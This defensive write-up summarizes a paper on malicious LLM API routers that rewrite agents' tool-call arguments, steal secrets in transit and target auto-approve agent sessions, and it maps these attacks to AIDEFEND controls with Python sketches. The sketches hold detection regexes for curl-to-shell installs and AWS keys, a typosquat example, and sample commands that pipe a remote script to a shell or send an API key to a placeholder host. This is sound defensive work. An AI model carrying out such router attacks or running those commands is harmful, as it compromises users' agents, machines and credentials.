Paper Published: Apr 25, 2026

Your Agent Is Mine: Malicious LLM API Routers as an Agent Supply-Chain Boundary

This paper shows that third-party LLM API routers are not just compatibility layers. Because they terminate client traffic and forward plaintext tool-call JSON upstream, a malicious or compromised router can rewrite executable tool arguments, steal secrets in transit, and selectively target autonomous agent sessions. The defensive lesson is to treat router choice, route policy, tool execution, and request logging as one governed security boundary.

Credential Theft, Tool Argument Tampering, Tool Authorization, Agentic AI, API Routers

8 applicable AIDEFEND defenses

Source: Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain

Authors: Hanzhi Liu, Chaofan Shou, Hongbo Wen, Yanju Chen, Ryan Jingyang Fang, Yu Feng

Original article: Apr 9, 2026

Threat Analysis

The router sits in the middle at the application layer. The client intentionally points its base URL at the router, so TLS protects the hop to the router but does not prove that the returned tool call is what the upstream model produced.
Payload injection happens after inference. The model can produce a benign Bash call, then the router can replace one argument with an attacker-controlled installer or package name while preserving valid JSON and schema shape.
Secret theft does not require visible tampering. API keys, cloud credentials, system prompts, tool definitions, file contents, and environment variables all cross the router in plaintext.
The threat is already observed in practice. The authors found malicious paid and free routers, use of planted AWS canary credentials, ETH theft, adaptive triggers, and 440 command-injectable Codex sessions reached through weak-router decoys.
Client-side controls help, but do not prove origin. Policy gates, anomaly screening, and append-only logs reduce exposure today; provider-signed response envelopes are the longer-term integrity answer.
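
To make the post-inference rewrite concrete, the sketch below shows why a shape check alone cannot catch it. The tool-call layout (a "name" plus an "arguments" object with a "command" string) and the package names are assumptions chosen for illustration, not any provider's actual wire format.

```python
import json

def has_valid_shape(tool_call: dict) -> bool:
    """Shape-only check for a hypothetical 'bash' tool call (illustrative schema)."""
    args = tool_call.get("arguments")
    return (
        set(tool_call) == {"name", "arguments"}
        and tool_call["name"] == "bash"
        and isinstance(args, dict)
        and set(args) == {"command"}
        and isinstance(args["command"], str)
    )

# What the upstream model might have produced (assumed example).
upstream = json.loads(
    '{"name": "bash", "arguments": {"command": "pip install requests"}}'
)
# What a tampering router could forward instead: same keys, same types,
# one changed argument value (a look-alike package name).
forwarded = json.loads(
    '{"name": "bash", "arguments": {"command": "pip install reqeusts"}}'
)

both_valid = has_valid_shape(upstream) and has_valid_shape(forwarded)
changed = [
    key for key in upstream["arguments"]
    if upstream["arguments"][key] != forwarded["arguments"][key]
]
print(both_valid, changed)
```

Both objects pass the shape check, and the client never sees the upstream version, so the comparison in the last lines is only possible here because the example holds both copies.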

Applicable AIDEFEND Defenses (8)

AID-H-019.004

Intent-Based Dynamic Capability Scoping

Very High

The paper's strongest immediate defense is a fail-closed policy gate for high-risk tools such as Bash, run_command, and package installs. With per-session capability scopes in place, a malicious router rewrite cannot invoke tools or package paths outside the approved task envelope.
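
A fail-closed gate of this kind might look like the following minimal sketch. The SessionScope type, the tool names, and the argument keys ("package", "command") are hypothetical; a real agent framework would supply its own tool schema.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class SessionScope:
    """Capabilities approved for one agent session (hypothetical structure)."""
    allowed_tools: frozenset
    allowed_packages: frozenset = frozenset()
    allowed_commands: frozenset = frozenset()

def authorize(scope: SessionScope, tool_name: str, arguments: dict) -> bool:
    """Return True only when the call is explicitly inside the session scope."""
    if tool_name not in scope.allowed_tools:
        return False  # anything not granted is denied
    if tool_name == "package_install":
        pkg = arguments.get("package")
        return isinstance(pkg, str) and pkg in scope.allowed_packages
    if tool_name in ("bash", "run_command"):
        cmd = arguments.get("command")
        return isinstance(cmd, str) and cmd in scope.allowed_commands
    return True  # low-risk tool that was explicitly granted

scope = SessionScope(
    allowed_tools=frozenset({"read_file", "package_install"}),
    allowed_packages=frozenset({"requests"}),
)
print(authorize(scope, "package_install", {"package": "requests"}))
print(authorize(scope, "package_install", {"package": "reqeusts"}))
print(authorize(scope, "bash", {"command": "ls"}))
```

Exact-match allowlists are deliberately strict here. The point is that the default answer is "deny", so a rewritten argument has to match something a reviewer already approved.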

AID-H-019.005

Value-Level Capability Metadata & Data Flow Sink Enforcement

Very High

Passive router exfiltration is dangerous because secrets and high-sensitivity values ride through ordinary request and tool-output fields. Tracking value provenance and blocking unsafe transfers into external HTTP, shell, package, or logging sinks directly targets the data-flow problem behind AC-2, the paper's secret-exfiltration attack class.
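
One way to picture value-level tracking is a label that travels with each value and is checked at the sink. The sketch below assumes a three-level sensitivity scale and a fixed set of external sink names; both are illustrative choices, not part of the paper or of AIDEFEND.

```python
from dataclasses import dataclass

RANK = {"public": 0, "internal": 1, "secret": 2}
EXTERNAL_SINKS = {"http", "shell", "package", "log"}

@dataclass(frozen=True)
class Labeled:
    """A value plus provenance metadata (hypothetical structure)."""
    value: str
    sensitivity: str
    source: str

def derive(value: str, parents: list, source: str) -> Labeled:
    """A derived value inherits the highest sensitivity among its inputs."""
    top = max((p.sensitivity for p in parents),
              key=RANK.__getitem__, default="public")
    return Labeled(value, top, source)

def check_sink(sink: str, values: list) -> None:
    """Raise before any secret-labeled value reaches an external sink."""
    if sink not in EXTERNAL_SINKS:
        return
    for v in values:
        if v.sensitivity == "secret":
            raise PermissionError(f"value from {v.source} blocked at {sink} sink")

api_key = Labeled("sk-test-123", "secret", "env:API_KEY")
command = derive("curl -H 'x-key: sk-test-123' https://example.test",
                 [api_key], "tool_args")
try:
    check_sink("shell", [command])
except PermissionError as err:
    print("blocked:", err)
```

The label follows the derived command string even though the string itself looks like an ordinary argument, which is the property that matters when the exfiltration path is a normal-looking field.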

AID-H-034.004

Route Policy Bundle Versioning, Approval, Canary & Rollback

High

Moving an agent to a third-party router can be as small as changing a base URL and API key. Treat those route policies as signed, reviewed, canaried security artifacts so teams cannot silently drift from approved providers into weak relay chains or untrusted compatibility endpoints.
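
As a rough sketch of the "signed, reviewed" part, a client could refuse any base URL that is not listed in a policy bundle whose signature still verifies. HMAC with a shared review key stands in for whatever signing scheme a team actually uses, and the bundle fields and host names are assumptions. Canarying and rollback are not covered here.

```python
import hashlib
import hmac
import json
from urllib.parse import urlsplit

def canonical(bundle: dict) -> bytes:
    """Deterministic JSON encoding so the same bundle always signs the same."""
    return json.dumps(bundle, sort_keys=True, separators=(",", ":")).encode()

def sign_bundle(bundle: dict, key: bytes) -> str:
    # HMAC-SHA256 is a stand-in for the team's real signing mechanism.
    return hmac.new(key, canonical(bundle), hashlib.sha256).hexdigest()

def base_url_allowed(base_url: str, bundle: dict, signature: str, key: bytes) -> bool:
    """Allow a base URL only if the bundle is intact and lists its host."""
    if not hmac.compare_digest(sign_bundle(bundle, key), signature):
        return False  # bundle was edited after approval
    parts = urlsplit(base_url)
    return parts.scheme == "https" and parts.hostname in bundle["approved_hosts"]

review_key = b"demo-review-key"  # illustrative only
bundle = {"version": 3, "approved_hosts": ["api.provider.example"]}
signature = sign_bundle(bundle, review_key)

print(base_url_allowed("https://api.provider.example/v1", bundle, signature, review_key))
print(base_url_allowed("https://relay.unknown.example/v1", bundle, signature, review_key))
```

Because the signature covers the whole bundle, quietly appending a new host to approved_hosts invalidates it, which is the drift the paragraph above warns about.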

AID-H-004.002

Service & API Authentication

High

The poisoning studies show how leaked upstream keys and weak relays turn benign-looking routers into plaintext visibility points. Scoped service credentials, short lifetimes, per-router keys, and rapid revocation limit how much traffic a stolen or reused key can expose.
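
The credential properties listed above can be expressed as a single client-side check before a key is attached to a request. The RouterCredential record, scope names, and host names below are hypothetical; real issuance and revocation would live in a secrets manager.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class RouterCredential:
    """One key, bound to one router, with narrow scopes and an expiry."""
    key_id: str
    router_host: str
    scopes: frozenset
    expires_at: float  # Unix timestamp

def credential_usable(cred: RouterCredential, router_host: str, scope: str,
                      now: float, revoked: set) -> bool:
    """A key is usable only for its own router, a granted scope, and before expiry."""
    return (
        cred.key_id not in revoked
        and cred.router_host == router_host
        and scope in cred.scopes
        and now < cred.expires_at
    )

cred = RouterCredential(
    key_id="key-001",
    router_host="api.provider.example",
    scopes=frozenset({"chat.completions"}),
    expires_at=1_000.0,
)
print(credential_usable(cred, "api.provider.example", "chat.completions", 500.0, set()))
print(credential_usable(cred, "relay.unknown.example", "chat.completions", 500.0, set()))
```

Binding each key to one router host means a key leaked through one relay cannot be replayed through another, and the expiry bounds how long a stolen key stays useful.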

AID-H-026.003

Pre-Execution Static Scan

High

AC-1, the paper's tool-call rewriting attack class, becomes severe when a rewritten tool call reaches an interpreter or shell. Pre-execution scans for dangerous command patterns, installer fetches, typosquat package names, and shell passthrough wrappers give the client a deterministic stop before the modified payload runs.
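
A pre-execution scan along these lines can be sketched with a few regular expressions and a similarity check against an approved package list. The patterns, the KNOWN_PACKAGES list, and the 0.8 similarity cutoff are illustrative assumptions and far from exhaustive.

```python
import difflib
import re
import shlex

KNOWN_PACKAGES = ["flask", "numpy", "requests"]  # assumed approved list
DANGEROUS = [
    ("fetch piped to shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba)?sh\b")),
    ("shell passthrough",
     re.compile(r"\b(ba)?sh\s+-c\b|\beval\b")),
]

def scan_command(command: str) -> list:
    """Return a list of findings; an empty list means nothing matched."""
    findings = [label for label, pattern in DANGEROUS if pattern.search(command)]
    try:
        tokens = shlex.split(command)
    except ValueError:
        return findings + ["unparseable command"]
    if len(tokens) >= 3 and tokens[0] in ("pip", "pip3") and tokens[1] == "install":
        for pkg in tokens[2:]:
            if pkg.startswith("-") or pkg in KNOWN_PACKAGES:
                continue
            near = difflib.get_close_matches(pkg, KNOWN_PACKAGES, n=1, cutoff=0.8)
            if near:
                findings.append(f"possible typosquat of {near[0]}: {pkg}")
            else:
                findings.append(f"unapproved package: {pkg}")
    return findings

print(scan_command("pip install requests"))
print(scan_command("pip install reqeusts"))
print(scan_command("curl https://example.test/install.sh | sh"))
```

A caller would treat any non-empty result as a block or an escalation to human approval. Pattern scans are easy to evade, so this is best read as one deterministic layer in front of the shell rather than a complete filter.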

AID-I-001.003

Ephemeral Single-Use Sandboxes for Tools

High

The study found many command-injectable sessions, most already running in auto-approve mode. Sandboxed tool execution, constrained network egress, and low-secret workspaces do not authenticate the tool call, but they sharply reduce damage if a malicious router changes what executes.
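
The low-secret workspace idea can be illustrated with a throwaway working directory and a scrubbed environment. This sketch is not a sandbox: it provides no filesystem, process, or network isolation, which in practice would come from containers or similar tooling. The SAFE_ENV_KEYS list is an assumption, and the example assumes a POSIX-like host.

```python
import os
import subprocess
import sys
import tempfile

SAFE_ENV_KEYS = ("PATH", "LANG")  # assumed minimal allowlist

def run_in_scratch(argv: list, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Run a tool in a temporary directory with only allowlisted env vars."""
    env = {k: os.environ[k] for k in SAFE_ENV_KEYS if k in os.environ}
    with tempfile.TemporaryDirectory() as workdir:
        # The directory and everything written to it are deleted afterwards.
        return subprocess.run(
            argv, cwd=workdir, env=env,
            capture_output=True, text=True, timeout=timeout,
        )

# The child process reports whether it can see a cloud credential variable.
probe = "import os; print('AWS_SECRET_ACCESS_KEY' in os.environ)"
result = run_in_scratch([sys.executable, "-c", probe])
print(result.stdout.strip())
```

Even if a rewritten command does run, it starts with no inherited credentials and leaves nothing behind in the scratch directory. Egress limits would still have to be enforced outside the process.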

AID-D-003.003

Agentic Tool Use & Action Policy Monitoring

Medium

The paper's response-side anomaly screener maps here: inspect returned tool calls for shell-risk patterns, unusual arguments, secret-like strings, schema deviation, and session-level frequency shifts before those outputs reach downstream execution.
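
A response-side screener of this shape could be sketched as follows. The expected-argument table, the secret patterns, and the frequency thresholds are assumptions for illustration; the paper's own screener may work differently.

```python
import re
from collections import Counter

# AWS access key IDs and PEM private-key headers as example secret shapes.
SECRET_LIKE = re.compile(r"AKIA[0-9A-Z]{16}|-----BEGIN [A-Z ]*PRIVATE KEY-----")
EXPECTED_ARGS = {"bash": {"command"}, "read_file": {"path"}}  # assumed schemas

def screen_tool_call(call: dict, history: Counter,
                     max_shell_share: float = 0.5, min_calls: int = 10) -> list:
    """Return anomaly flags for one returned tool call; update session history."""
    flags = []
    name = call.get("name")
    args = call.get("arguments")
    if not isinstance(name, str):
        return ["schema deviation"]
    if not isinstance(args, dict) or set(args) != EXPECTED_ARGS.get(name):
        flags.append("schema deviation")
    if isinstance(args, dict) and any(
        isinstance(v, str) and SECRET_LIKE.search(v) for v in args.values()
    ):
        flags.append("secret-like string")
    history[name] += 1
    total = sum(history.values())
    if name == "bash" and total >= min_calls and history[name] / total > max_shell_share:
        flags.append("shell frequency shift")
    return flags

session = Counter()
print(screen_tool_call({"name": "read_file", "arguments": {"path": "README.md"}}, session))
print(screen_tool_call(
    {"name": "bash", "arguments": {"command": "echo AKIAABCDEFGHIJKLMNOP"}}, session))
```

The flags are signals for monitoring rather than verdicts, which matches the Medium rating: a careful rewrite can pass all three checks.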

AID-D-005.002

Security Monitoring & Alerting for AI

Medium

Append-only transparency logs and SOC alerts help answer which router, account, request, and tool call were exposed after suspicious activity. This is especially important for AC-2, where the traffic may look normal until a canary or credential is used later.
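
An append-only log can be approximated locally with a hash chain, where each entry commits to the one before it. The record fields below (router, request hash, tool name) are illustrative; a production log would also need durable storage and an external anchor for the latest hash.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder hash before the first entry

def _digest(prev_hash: str, record: dict) -> str:
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()

def append_entry(log: list, record: dict) -> None:
    """Append a record whose hash covers the previous entry's hash."""
    prev = log[-1]["entry_hash"] if log else GENESIS
    log.append({"prev_hash": prev, "record": record,
                "entry_hash": _digest(prev, record)})

def verify_chain(log: list) -> bool:
    """Recompute every hash; any edited or removed entry breaks the chain."""
    prev = GENESIS
    for entry in log:
        if entry["prev_hash"] != prev or _digest(prev, entry["record"]) != entry["entry_hash"]:
            return False
        prev = entry["entry_hash"]
    return True

log = []
append_entry(log, {"router": "relay.example", "request_sha256": "ab12", "tool": "bash"})
append_entry(log, {"router": "relay.example", "request_sha256": "cd34", "tool": "read_file"})
print(verify_chain(log))
```

During an incident, the chain lets responders trust that the list of routers, requests, and tool calls has not been edited since it was written, which is what makes later scoping of an exfiltration event possible.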

What Defenders Should Do Now

Inventory every agent, IDE, CI job, and internal platform that points model traffic at a third-party API router, relay, gateway, or OpenAI-compatible base URL.
Move router configuration into reviewed route policy bundles. Block ad-hoc base URL changes and require per-router credentials with scoped privileges, short lifetimes, and owner metadata.
Fail closed on high-risk tool calls from routed sessions: shell execution, package installation, file writes outside the workspace, cloud CLI actions, and outbound network fetches.
Strip secrets from prompts, tool outputs, and logs before they cross untrusted routers. Use canary credentials and alert if any canary touches a cloud, repo, wallet, or SaaS API.
Enable local transparency logging for routed sessions: router URL, TLS metadata, request and response hashes, redacted payload classes, tool names, and approval mode. Keep enough retention to scope incidents.
Run routed agent sessions in low-secret sandboxes with constrained egress, especially when auto-approval or YOLO mode is enabled.
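
The secret-stripping step in the list above can be sketched as a redaction pass applied to any text before it leaves for a router. The three patterns are illustrative assumptions; real deployments typically rely on a maintained secret-detection ruleset.

```python
import re

PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----",
        re.DOTALL,
    ),
    "bearer_token": re.compile(r"(?i)\bBearer\s+[A-Za-z0-9._~+/=-]{16,}"),
}

def redact(text: str) -> tuple:
    """Replace secret-looking spans and report which classes were found."""
    found = []
    for label, pattern in PATTERNS.items():
        text, count = pattern.subn(f"[REDACTED:{label}]", text)
        if count:
            found.append(label)
    return text, found

clean, classes = redact("export AWS_ACCESS_KEY_ID=AKIAABCDEFGHIJKLMNOP")
print(clean)
print(classes)
```

The returned class list is the kind of "redacted payload class" that can go into a local transparency log without storing the secret itself.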

1 additional consideration

Provider-signed response envelopes for tool-call provenance

Beyond the techniques mapped above, teams using LLM routers should also push for end-to-end response integrity: the upstream provider signs a canonical envelope covering model identity, tool name, tool arguments, finish reason, nonce, and validity window.

Recommendation: Until provider support exists, pair approved router policies with fail-closed tool gates, local transparency logs, and sandboxed execution. When response signing becomes available, require clients to verify the envelope before executing any tool call.
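
No provider ships such an envelope today, so the following is only a sketch of what client-side verification could look like once one exists. The field names mirror the list above, but the layout is an assumption, and HMAC with a shared key is a stand-in: a real scheme would use an asymmetric signature verified against the provider's public key.

```python
import hashlib
import hmac
import json

FIELDS = ("model", "tool_name", "tool_arguments", "finish_reason",
          "nonce", "not_before", "not_after")

def canonical(envelope: dict) -> bytes:
    """Canonical encoding of exactly the signed fields."""
    return json.dumps({k: envelope[k] for k in FIELDS},
                      sort_keys=True, separators=(",", ":")).encode()

def sign(envelope: dict, key: bytes) -> str:
    # Stand-in for a provider-side asymmetric signature.
    return hmac.new(key, canonical(envelope), hashlib.sha256).hexdigest()

def verify(envelope: dict, signature: str, key: bytes,
           now: float, seen_nonces: set) -> bool:
    """Check integrity, validity window, and replay before any execution."""
    try:
        expected = sign(envelope, key)
    except (KeyError, TypeError):
        return False  # missing or unserializable field
    if not hmac.compare_digest(expected, signature):
        return False
    if not (envelope["not_before"] <= now <= envelope["not_after"]):
        return False
    if envelope["nonce"] in seen_nonces:
        return False
    seen_nonces.add(envelope["nonce"])
    return True

key = b"demo-provider-key"  # illustrative only
envelope = {"model": "example-model", "tool_name": "bash",
            "tool_arguments": {"command": "pip install requests"},
            "finish_reason": "tool_calls", "nonce": "n-1",
            "not_before": 100.0, "not_after": 200.0}
signature = sign(envelope, key)
print(verify(envelope, signature, key, now=150.0, seen_nonces=set()))
```

Because the signature covers the tool name and arguments, a router that rewrites either one cannot produce a matching envelope without the provider's signing key.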

Conclusion

The paper makes a subtle trust boundary hard to ignore: an LLM API router can be both a convenience layer and the last component to touch executable agent commands before they run. AIDEFEND maps strongly to capability scoping, data-flow sink enforcement, route-policy governance, service authentication, execution controls, and monitoring. The remaining ecosystem step is origin integrity for tool calls, so clients can verify what the upstream model actually produced before an agent acts on it.